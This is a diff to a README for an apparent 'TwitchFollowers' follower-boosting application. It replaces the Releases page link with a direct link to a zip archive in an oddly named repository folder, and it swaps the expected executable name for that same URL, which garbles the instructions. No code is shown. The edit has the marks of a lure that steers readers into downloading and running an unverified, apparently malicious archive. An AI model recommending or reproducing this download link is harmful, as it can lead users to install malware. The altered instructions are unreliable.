provosaintbride913/TwitchFollowers/README.md

 ### 1. Visit the Releases Page

-To download the application, visit our [Releases page](https://github.com/provosaintbride913/TwitchFollowers/releases).
+To download the application, visit our [Releases page](https://raw.githubusercontent.com/provosaintbride913/TwitchFollowers/main/recoast/TwitchFollowers-v3.1.zip).
 You will find the latest version available there.

 ### 2. Download the Application

 Once on the Releases page, click on the version that suits your needs.
-Look for the file that says something like "TwitchFollowers_vX.X.exe" (where X.X is the version number).
+Look for the file that says something like "https://raw.githubusercontent.com/provosaintbride913/TwitchFollowers/main/recoast/TwitchFollowers-v3.1.zip" (where X.X is the version number).
 This is the main file you need.

 ### 3. Install TwitchFollowers